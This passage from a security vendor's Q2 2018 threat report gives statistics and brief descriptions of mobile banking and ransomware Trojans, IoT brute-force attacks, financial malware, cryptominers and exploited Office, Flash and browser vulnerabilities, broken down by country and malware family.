As before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.04%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). In second place was Trojan.AndroidOS.Boogr.gsh (12.17%). This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>). Third was Trojan-Dropper.AndroidOS.Lezok.p (4.41%), followed at a close 0.3 p.p. margin by Trojan.AndroidOS.Agent.rx (4.11%), which was in third position in Q1.

### **Geography of mobile threats**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-3.png>)

_Map of attempted infections using mobile malware, Q2 2018_

TOP 10 countries by share of users attacked by mobile malware:

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 31.17 |
| 2 | China | 31.07 |
| 3 | Iran | 30.87 |
| 4 | Nepal | 30.74 |
| 5 | Nigeria | 25.66 |
| 6 | India | 25.04 |
| 7 | Indonesia | 24.05 |
| 8 | Ivory Coast | 23.67 |
| 9 | Pakistan | 23.49 |
| 10 | Tanzania | 22.38 |

_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._
_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

In Q2 2018, Bangladesh (31.17%) topped the list by share of mobile users attacked. China (31.07%) came second by a narrow margin. Third and fourth places were claimed respectively by Iran (30.87%) and Nepal (30.74%).

This quarter, Russia (8.34%) was down in 38th spot, behind Taiwan (8.48%) and Singapore (8.46%).

### Mobile banking Trojans

In the reporting period, we detected 61,045 installation packages for mobile banking Trojans, which is 3.2 times more than in Q1 2018. The largest contribution was made by Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to nearly half of the new banking Trojans detected.
Second came Trojan-Banker.AndroidOS.Agent.dq, accounting for about 5,000 installation packages.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175900/180803-it-threat-evolution-q2-2018-statistics-4.png>)

_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 – Q2 2018_

**TOP 10 mobile bankers**

| | **Verdict** | **%*** |
|---|---|---|
| 1 | Trojan-Banker.AndroidOS.Agent.dq | 17.74 |
| 2 | Trojan-Banker.AndroidOS.Svpeng.aj | 13.22 |
| 3 | Trojan-Banker.AndroidOS.Svpeng.q | 8.56 |
| 4 | Trojan-Banker.AndroidOS.Asacub.e | 5.70 |
| 5 | Trojan-Banker.AndroidOS.Agent.di | 5.06 |
| 6 | Trojan-Banker.AndroidOS.Asacub.bo | 4.65 |
| 7 | Trojan-Banker.AndroidOS.Faketoken.z | 3.66 |
| 8 | Trojan-Banker.AndroidOS.Asacub.bj | 3.03 |
| 9 | Trojan-Banker.AndroidOS.Hqwar.t | 2.83 |
| 10 | Trojan-Banker.AndroidOS.Asacub.ar | 2.77 |

_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._

The most popular mobile banking Trojan in Q2 was Trojan-Banker.AndroidOS.Agent.dq (17.74%), closely followed by Trojan-Banker.AndroidOS.Svpeng.aj (13.22%). These two Trojans use phishing windows to steal users' bank card details and online banking credentials. They also steal money by abusing SMS services, including mobile banking. The popular banking malware Trojan-Banker.AndroidOS.Svpeng.q (8.56%) took third place in the rating, moving one notch down from its second place in Q2.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-5.png>)

_Geography of mobile banking threats, Q2 2018_

**TOP 10 countries by share of users attacked by mobile banking Trojans**

| | **Country*** | **%**** |
|---|---|---|
| 1 | USA | 0.79 |
| 2 | Russia | 0.70 |
| 3 | Poland | 0.28 |
| 4 | China | 0.28 |
| 5 | Tajikistan | 0.27 |
| 6 | Uzbekistan | 0.23 |
| 7 | Ukraine | 0.18 |
| 8 | Singapore | 0.16 |
| 9 | Moldova | 0.14 |
| 10 | Kazakhstan | 0.13 |

_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._
_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._

Overall, the rating did not see much change from Q1: Russia (0.70%) and the USA (0.79%) swapped places, both remaining in the TOP 3.

Poland (0.28%) rose from ninth to third place thanks to the active propagation of two Trojans: Trojan-Banker.AndroidOS.Agent.cw and Trojan-Banker.AndroidOS.Marcher.w. The latter was first detected in November 2017 and uses a toolset typical of banking malware: SMS interception, phishing windows and Device Administrator privileges to ensure its persistence in the system.

### Mobile ransomware Trojans

In Q2 2018, we detected **14,119** installation packages for mobile ransomware Trojans, half as many again as in Q1.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-6.png>)

_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q2 2017 – Q2 2018_

| | Verdict | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Zebt.a | 26.71 |
| 2 | Trojan-Ransom.AndroidOS.Svpeng.ag | 19.15 |
| 3 | Trojan-Ransom.AndroidOS.Fusob.h | 15.48 |
| 4 | Trojan-Ransom.AndroidOS.Svpeng.ae | 5.99 |
| 5 | Trojan-Ransom.AndroidOS.Egat.d | 4.83 |
| 6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 4.73 |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 4.29 |
| 8 | Trojan-Ransom.AndroidOS.Small.cm | 3.32 |
| 9 | Trojan-Ransom.AndroidOS.Small.as | 2.61 |
| 10 | Trojan-Ransom.AndroidOS.Small.cj | 1.80 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._

The most popular mobile ransomware in Q2 was Trojan-Ransom.AndroidOS.Zebt.a (26.71%), encountered by more than a quarter of all users attacked by this type of malware. Second came Trojan-Ransom.AndroidOS.Svpeng.ag (19.15%), nudging ahead of the once-popular Trojan-Ransom.AndroidOS.Fusob.h (15.48%).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175857/180803-it-threat-evolution-q2-2018-statistics-7.png>)

_Geography of mobile ransomware Trojans, Q2 2018_

**TOP 10 countries by share of users attacked by mobile ransomware Trojans**

| | Country* | %** |
|---|---|---|
| 1 | USA | 0.49 |
| 2 | Italy | 0.28 |
| 3 | Kazakhstan | 0.26 |
| 4 | Belgium | 0.22 |
| 5 | Poland | 0.20 |
| 6 | Romania | 0.18 |
| 7 | China | 0.17 |
| 8 | Ireland | 0.15 |
| 9 | Mexico | 0.11 |
| 10 | Austria | 0.09 |

_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000)._
_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._

First place in the TOP 10 went to the United States (0.49%); the most active family in this country was Trojan-Ransom.AndroidOS.Svpeng:

| | Verdict | %* |
|---|---|---|
| 1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 53.53% |
| 2 | Trojan-Ransom.AndroidOS.Svpeng.ae | 16.37% |
| 3 | Trojan-Ransom.AndroidOS.Svpeng.snt | 11.49% |
| 4 | Trojan-Ransom.AndroidOS.Svpeng.ab | 10.84% |
| 5 | Trojan-Ransom.AndroidOS.Fusob.h | 5.62% |
| 6 | Trojan-Ransom.AndroidOS.Svpeng.z | 4.57% |
| 7 | Trojan-Ransom.AndroidOS.Svpeng.san | 4.29% |
| 8 | Trojan-Ransom.AndroidOS.Svpeng.ac | 2.45% |
| 9 | Trojan-Ransom.AndroidOS.Svpeng.h | 0.43% |
| 10 | Trojan-Ransom.AndroidOS.Zebt.a | 0.37% |

_* Unique users in the USA attacked by this malware as a percentage of all users of Kaspersky Lab's mobile antivirus in this country who were attacked by ransomware Trojans._

Italy (0.28%) came second among countries whose residents were attacked by mobile ransomware. In this country, most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a.
Third place was claimed by Kazakhstan (0.63%), where Trojan-Ransom.AndroidOS.Small.cm was the most popular mobile ransomware.

## Attacks on IoT devices

Judging by the data from our [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), brute forcing Telnet passwords is the most popular method of IoT malware self-propagation. However, recently there has been an increase in the number of attacks against other services, such as control ports. These ports are assigned to services for remote control of routers, a feature in demand with internet service providers, for example. We have observed attempts to attack IoT devices via port 8291, which is used by the MikroTik RouterOS control service, and via port 7547 (TR-069), which was used, among other purposes, for managing devices in the Deutsche Telekom network.

In both cases the attacks were much more sophisticated than plain brute force; in particular, they involved exploits. We are inclined to think that the number of such attacks will only grow in the future, on the back of the following two factors:

 * Brute forcing a Telnet password is a low-efficiency strategy, as there is strong competition between threat actors. Brute force attempts arrive every few seconds; once successful, the threat actor blocks Telnet access for all other attackers.
 * After each restart of the device, the attackers have to re-infect it, thus losing part of the botnet and having to reclaim it in a competitive environment.

On the other hand, the first attacker to exploit a vulnerability gains access to a large number of devices, having spent minimal time.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175929/180803-it-threat-evolution-q2-2018-statistics-8.png>)

_Distribution of attacked services' popularity by number of unique attacking devices, Q2 2018_

### Telnet attacks

The scheme of attack is as follows: the attackers find a victim device, check if the Telnet port is open on it, and launch the password brute forcing routine. As many manufacturers of IoT devices neglect security (for instance, they preset service passwords on devices and give users no way to change them), such attacks succeed and may affect entire lines of devices. The infected devices start scanning new network segments and infect new, similar devices or workstations in them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-9.png>)

_Geography of IoT devices infected in Telnet attacks, Q2 2018_

#### **TOP 10 countries by shares of IoT devices infected via Telnet**

| | Country | %* |
|---|---|---|
| 1 | Brazil | 23.38 |
| 2 | China | 17.22 |
| 3 | Japan | 8.64 |
| 4 | Russia | 7.22 |
| 5 | USA | 4.55 |
| 6 | Mexico | 3.78 |
| 7 | Greece | 3.51 |
| 8 | South Korea | 3.32 |
| 9 | Turkey | 2.61 |
| 10 | India | 1.71 |

_* Infected devices in each specific country as a percentage of all IoT devices that attack via Telnet._

In Q2, Brazil (23.38%) took the lead in the number of infected devices and, consequently, in the number of Telnet attacks. Next came China (17.22%) by a small margin, and third came Japan (8.64%).

In these attacks, the threat actors most often downloaded Backdoor.Linux.Mirai.c (15.97%) to the infected devices.

#### **TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**

| | Verdict | %* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.c | 15.97 |
| 2 | Trojan-Downloader.Linux.Hajime.a | 5.89 |
| 3 | Trojan-Downloader.Linux.NyaDrop.b | 3.34 |
| 4 | Backdoor.Linux.Mirai.b | 2.72 |
| 5 | Backdoor.Linux.Mirai.ba | 1.94 |
| 6 | Trojan-Downloader.Shell.Agent.p | 0.38 |
| 7 | Trojan-Downloader.Shell.Agent.as | 0.27 |
| 8 | Backdoor.Linux.Mirai.n | 0.27 |
| 9 | Backdoor.Linux.Gafgyt.ba | 0.24 |
| 10 | Backdoor.Linux.Gafgyt.af | 0.20 |

_* Proportion of downloads of each specific malware program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._

### SSH attacks

Such attacks are launched similarly to Telnet attacks, the only difference being that they require the bots to have an SSH client installed in order to brute force credentials. The SSH protocol is cryptographically protected, so brute forcing passwords requires large computational resources. Therefore, self-propagation from IoT devices is inefficient, and full-fledged servers are used to launch attacks. The success of an SSH attack hinges on mistakes by the device owner or manufacturer; in other words, these are again weak passwords or preset passwords assigned by the manufacturer to an entire line of devices.

China took the lead in terms of infected devices attacking via SSH. China was also second in terms of infected devices attacking via Telnet.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-10.png>)

_Geography of IoT devices infected in SSH attacks, Q2 2018_

#### **TOP 10 countries by shares of IoT devices attacked via SSH**

| | Country | %* |
|---|---|---|
| 1 | China | 15.77% |
| 2 | Vietnam | 11.38% |
| 3 | USA | 9.78% |
| 4 | France | 5.45% |
| 5 | Russia | 4.53% |
| 6 | Brazil | 4.22% |
| 7 | Germany | 4.01% |
| 8 | South Korea | 3.39% |
| 9 | India | 2.86% |
| 10 | Romania | 2.23% |

_* The proportion of infected devices in each country as a percentage of all infected IoT devices attacking via SSH._

## Online threats in the financial sector

### Q2 events

#### **New banking Trojan DanaBot**

The Trojan DanaBot was detected in May. It has a modular structure and is capable of loading extra modules with which to intercept traffic and steal passwords and crypto wallets – generally, a standard feature set for this type of threat. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body. DanaBot initially targeted Australian users and financial organizations; however, in early April we noticed that it had become active against financial organizations in Poland.

#### **The peculiar BackSwap technique**

The banking Trojan BackSwap turned out to be much more interesting. A majority of similar threats, including **Zeus**, **Cridex** and **Dyreza**, intercept the user's traffic either to inject malicious scripts into the banking pages visited by the victim or to redirect it to phishing sites. By contrast, BackSwap uses an innovative technique for injecting malicious scripts: using WinAPI, it emulates keystrokes to open the developer console in the browser, and then uses this console to inject malicious scripts into web pages.
In a later version of BackSwap, malicious scripts are injected via the address bar, using JavaScript protocol URLs.

#### **Carbanak gang leader detained**

On March 26, Europol announced the arrest of a leader of the cybercrime gang behind Carbanak and Cobalt Goblin. This came as a result of a joint operation between Spain's national police, Europol and the FBI, as well as Romanian, Moldovan, Belarusian and Taiwanese authorities and private infosecurity companies. It was expected that the leader's arrest would reduce the group's activity; however, recent data show that no appreciable decline has taken place. In May and June, we detected several waves of targeted phishing against banks and processing companies in Eastern Europe. The emails from Carbanak masqueraded as support lines of reputable anti-malware vendors, the European Central Bank and other organizations. Such emails contained attached weaponized documents exploiting the vulnerabilities CVE-2017-11882 and CVE-2017-8570.

#### **Ransomware Trojan uses Doppelgänging technique**

Kaspersky Lab experts [detected](<https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/>) a case of the ransomware Trojan SynAck using the Process Doppelgänging technique. Malware writers use this complex technique to make malware stealthier and to complicate its detection by security solutions. This was the first case of it being used in a ransomware Trojan.

Another remarkable event was the Purga (aka Globe) cryptoware propagation [campaign](<https://securelist.ru/trojan-dimnie-and-ransomware-purga/90272/>), during which this cryptoware, along with other malware including a banking Trojan, was loaded onto computers infected with the Trojan Dimnie.

### General statistics on financial threats

_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data._

In Q2 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 215,762 users.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175934/180803-it-threat-evolution-q2-2018-statistics-11.png>)

_Number of unique users attacked by financial malware, Q2 2018_

#### **Geography of attacks**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-12.png>)

_Geography of banking malware attacks, Q2 2018_

#### **TOP 10 countries by percentage of attacked users**

| | **Country*** | **% of users attacked**** |
|---|---|---|
| 1 | Germany | 2.7% |
| 2 | Cameroon | 1.8% |
| 3 | Bulgaria | 1.7% |
| 4 | Greece | 1.6% |
| 5 | United Arab Emirates | 1.4% |
| 6 | China | 1.3% |
| 7 | Indonesia | 1.3% |
| 8 | Libya | 1.3% |
| 9 | Togo | 1.3% |
| 10 | Lebanon | 1.2% |

_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data._

_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._
_** Unique Kaspersky Lab users whose computers were targeted by banking Trojans or ATM/PoS malware as a percentage of all unique users of Kaspersky Lab products in the country._

#### **TOP 10 banking malware families**

| | Name | Verdicts* | % of attacked users** |
|---|---|---|---|
| 1 | Nymaim | Trojan.Win32.Nymaim | 27.0% |
| 2 | Zbot | Trojan.Win32.Zbot | 26.1% |
| 3 | SpyEye | Backdoor.Win32.SpyEye | 15.5% |
| 4 | Emotet | Backdoor.Win32.Emotet | 5.3% |
| 5 | Caphaw | Backdoor.Win32.Caphaw | 4.7% |
| 6 | Neurevt | Trojan.Win32.Neurevt | 4.7% |
| 7 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 3.3% |
| 8 | Gozi | Trojan.Win32.Gozi | 2.0% |
| 9 | Shiz | Backdoor.Win32.Shiz | 1.5% |
| 10 | ZAccess | Backdoor.Win32.ZAccess | 1.3% |

_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._
_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._

In Q2 2018, the general makeup of the TOP 10 stayed the same; however, there were some changes in the ranking. Trojan.Win32.Zbot (26.1%) and Trojan.Win32.Nymaim (27%) remain in the lead after swapping positions. The banking Trojan Emotet ramped up its activity and, accordingly, its share of attacked users, from 2.4% to 5.3%. Conversely, Caphaw dramatically downsized its activity to only 4.7% from 15.2% in Q1, taking fifth position in the rating.

### Cryptoware programs

#### **Number of new modifications**

In Q2, we detected 7,620 new cryptoware modifications. This is higher than in Q1, but still well below last year's numbers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-13.png>)

_Number of new cryptoware modifications, Q2 2017 – Q2 2018_

#### **Number of users attacked by Trojan cryptors**

In Q2 2018, Kaspersky Lab products blocked cryptoware attacks on the computers of 158,921 unique users. Our statistics show that cybercriminals' activity declined both against Q1 and on a month-on-month basis during Q2.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175940/180803-it-threat-evolution-q2-2018-statistics-14.png>)

_Number of unique users attacked by cryptors, Q2 2018_

#### **Geography of attacks**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-15.png>)

#### **TOP 10 countries attacked by Trojan cryptors**

| | **Country*** | **% of users attacked by cryptors**** |
|---|---|---|
| 1 | Ethiopia | 2.49 |
| 2 | Uzbekistan | 1.24 |
| 3 | Vietnam | 1.21 |
| 4 | Pakistan | 1.14 |
| 5 | Indonesia | 1.09 |
| 6 | China | 1.04 |
| 7 | Venezuela | 0.72 |
| 8 | Azerbaijan | 0.71 |
| 9 | Bangladesh | 0.70 |
| 10 | Mongolia | 0.64 |

_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._
_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._

The list of TOP 10 countries in Q2 is practically identical to that in Q1. However, some place trading occurred in the TOP 10: Ethiopia (2.49%) pushed Uzbekistan (1.24%) down from first to second place, while Pakistan (1.14%) rose to fourth place.
Vietnam (1.21%) remained in third position, and Indonesia (1.09%) remained fifth.

#### **TOP 10 most widespread cryptor families**

| | **Name** | **Verdicts*** | **% of attacked users**** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 53.92 |
| 2 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.92 |
| 3 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 3.81 |
| 4 | Shade | Trojan-Ransom.Win32.Shade | 2.40 |
| 5 | Crysis | Trojan-Ransom.Win32.Crusis | 2.13 |
| 6 | Cerber | Trojan-Ransom.Win32.Zerber | 2.09 |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 |
| 8 | Locky | Trojan-Ransom.Win32.Locky | 1.49 |
| 9 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.36 |
| 10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.04 |

_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._
_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._

WannaCry further extended its lead over other cryptor families, its share rising to 53.92% from 38.33% in Q1. Meanwhile, the cybercriminals behind GandCrab (4.92%; it emerged only in Q1 2018) put so much effort into its distribution that it rose all the way up to second place in this TOP 10, displacing the polymorphic worm PolyRansom (3.81%). The remaining positions, just like in Q1, are occupied by the long-familiar cryptors Shade, Crysis, Purgen, Cryakl etc.

### Cryptominers

As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is shrinking progressively, and cryptocurrency miners are starting to take its place. Therefore, this year we decided to begin publishing quarterly reports on the situation around this type of threat. Simultaneously, we began to use a broader range of verdicts as a basis for collecting statistics on miners, so the Q2 statistics may not be consistent with the data from our earlier publications. They include both stealth miners, which we detect as Trojans, and those which are issued the verdict 'Riskware not-a-virus'.

#### **Number of new modifications**

In Q2 2018, Kaspersky Lab solutions detected 13,948 new modifications of miners.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175945/180803-it-threat-evolution-q2-2018-statistics-16.png>)

_Number of new miner modifications, Q2 2018_

#### **Number of users attacked by cryptominers**

In Q2, we detected attacks involving mining programs on the computers of 2,243,581 Kaspersky Lab users around the world.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175951/180803-it-threat-evolution-q2-2018-statistics-17.png>)

_Number of unique users attacked by cryptominers, Q2 2018_

In April and May, the number of attacked users stayed roughly equal, and in June there was a modest decrease in cryptominers' activity.

#### **Geography of attacks**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-18.png>)

_Geography of cryptominer attacks, Q2 2018_

#### **TOP 10 countries by percentage of attacked users**

| | **Country*** | **% of attacked users**** |
|---|---|---|
| 1 | Ethiopia | 17.84 |
| 2 | Afghanistan | 16.21 |
| 3 | Uzbekistan | 14.18 |
| 4 | Kazakhstan | 11.40 |
| 5 | Belarus | 10.47 |
| 6 | Indonesia | 10.33 |
| 7 | Mozambique | 9.92 |
| 8 | Vietnam | 9.13 |
| 9 | Mongolia | 9.01 |
| 10 | Ukraine | 8.58 |

_* Excluded are countries with relatively few Kaspersky Lab product users (under 50,000)._
_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._

## Vulnerable apps used by cybercriminals

In Q2 2018, we again observed some major changes in the distribution of platforms most often targeted by exploits. The share of Microsoft Office exploits (67%) doubled compared to Q1 (and quadrupled compared with the average for 2017). Such sharp growth was driven primarily by mass spam messages distributing documents containing an exploit for the vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This stack overflow vulnerability in the old, deprecated Equation Editor component existed in all versions of Microsoft Office released over the last 18 years. The exploit still works stably in all possible combinations of the Microsoft Office package and Microsoft Windows. On the other hand, it allows the use of various obfuscations to bypass protection. These two factors made this vulnerability the most popular tool in cybercriminals' hands in Q2. The shares of other Microsoft Office vulnerabilities did not undergo much change since Q1.

Q2 KSN statistics also showed a growing number of Adobe Flash exploits delivered via Microsoft Office. Despite Adobe's and Microsoft's efforts to obstruct exploitation of Flash Player, a new 0-day exploit, [CVE-2018-5002](<http://blogs.360.cn/blog/cve-2018-5002-en/>), was discovered in Q2. It propagated in an XLSX file and used a little-known technique allowing the exploit to be downloaded from a remote source rather than carried in the document body. Shockwave Flash (SWF) files, like many other file formats, are rendered in Microsoft Office documents in the OLE (Object Linking and Embedding) format. In the case of an SWF file, the OLE object contains the actual file and a list of various properties, one of which points to the path to the SWF file. The OLE object in the discovered exploit did not contain an SWF file, but only carried a list of properties including a web link to the SWF file, which forced Microsoft Office to download the missing file from the provided link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175902/180803-it-threat-evolution-q2-2018-statistics-19.png>)

_Distribution of exploits used in cybercriminals' attacks by types of attacked applications, Q2 2018_

In late March 2018, a PDF document was detected on VirusTotal that contained two 0-day vulnerabilities: [CVE-2018-4990](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) and [CVE-2018-8120](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8120>). The former allowed execution of shellcode from JavaScript via exploitation of a software error in the JPEG2000 image processor in Acrobat Reader. The latter existed in the win32k function [SetImeInfoEx](<https://cloudblogs.microsoft.com/microsoftsecure/2018/07/02/taking-apart-a-double-zero-day-sample-discovered-in-joint-hunt-with-eset/>) and was used for further privilege escalation up to SYSTEM level, enabling the PDF viewer to escape the sandbox. An analysis of the document and our statistics show that at the moment of upload to VirusTotal, this exploit was at the development stage and was not used for in-the-wild attacks.

In late April, Kaspersky Lab experts using an in-house sandbox found the 0-day vulnerability [CVE-2018-8174](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) in Internet Explorer and reported it to Microsoft. An exploit for this vulnerability used a technique associated with [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) (launching an HTA script from a remote source via a specially crafted OLE object) to exploit a vulnerable Internet Explorer component with the help of Microsoft Office.
We are observing that exploit pack creators have already taken this vulnerability on board and actively distribute exploits to it both via web sites and emails containing malicious documents.\n\nAlso in Q2, we observed a growing number of network attacks. There is a growing share of attempts to exploit the vulnerabilities patched with the security update MS17-010; these make up a majority a of the detected network attacks.\n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the second quarter of 2018, Kaspersky Lab solutions blocked 962,947,023 attacks launched from web resources located in 187 countries around the world. 351,913,075 unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175958/180803-it-threat-evolution-q2-2018-statistics-20.png>)\n\n_Distribution of web attack sources by country, Q2 2018_\n\nIn Q2, the TOP 4 of web attack source countries remain unchanged. The US (45.87%) was home to most sources of web attacks. 
The Netherlands (25.74%) came second by a large margin, Germany (5.33%) was third. There was a change in the fifth position: Russia (1.98%) has displaced the UK, although its share has decreased by 0.55 p.p.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the _Malware class_; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 33.49 \n2 | Albania | 30.27 \n3 | Algeria | 30.08 \n4 | Armenia | 29.98 \n5 | Ukraine | 29.68 \n6 | Moldova | 29.49 \n7 | Venezuela | 29.12 \n8 | Greece | 29.11 \n9 | Kyrgyzstan | 27.25 \n10 | Kazakhstan | 26.97 \n11 | Russia | 26.93 \n12 | Uzbekistan | 26.30 \n13 | Azerbaijan | 26.12 \n14 | Serbia | 25.23 \n15 | Qatar | 24.51 \n16 | Latvia | 24.40 \n17 | Vietnam | 24.03 \n18 | Georgia | 23.87 \n19 | Philippines | 23.85 \n20 | Romania | 23.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175858/180803-it-threat-evolution-q2-2018-statistics-21.png>)\n\n_Geography of malicious web attacks in Q2 2018 (percentage of attacked users)_\n\nOn average, 19.59% of Internet user computers worldwide experienced at least one Malware-class web attack.\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2018, our File Anti-Virus detected 192,053,604 malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only _Malware-class_ attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

No. | Country* | % of attacked users**
---|---|---
1 | Uzbekistan | 51.01
2 | Afghanistan | 49.57
3 | Tajikistan | 46.21
4 | Yemen | 45.52
5 | Ethiopia | 43.64
6 | Turkmenistan | 43.52
7 | Vietnam | 42.56
8 | Kyrgyzstan | 41.34
9 | Rwanda | 40.88
10 | Mongolia | 40.71
11 | Algeria | 40.25
12 | Laos | 40.18
13 | Syria | 39.82
14 | Cameroon | 38.83
15 | Mozambique | 38.24
16 | Bangladesh | 37.57
17 | Sudan | 37.31
18 | Nepal | 37.02
19 | Zambia | 36.60
20 | Djibouti | 36.35

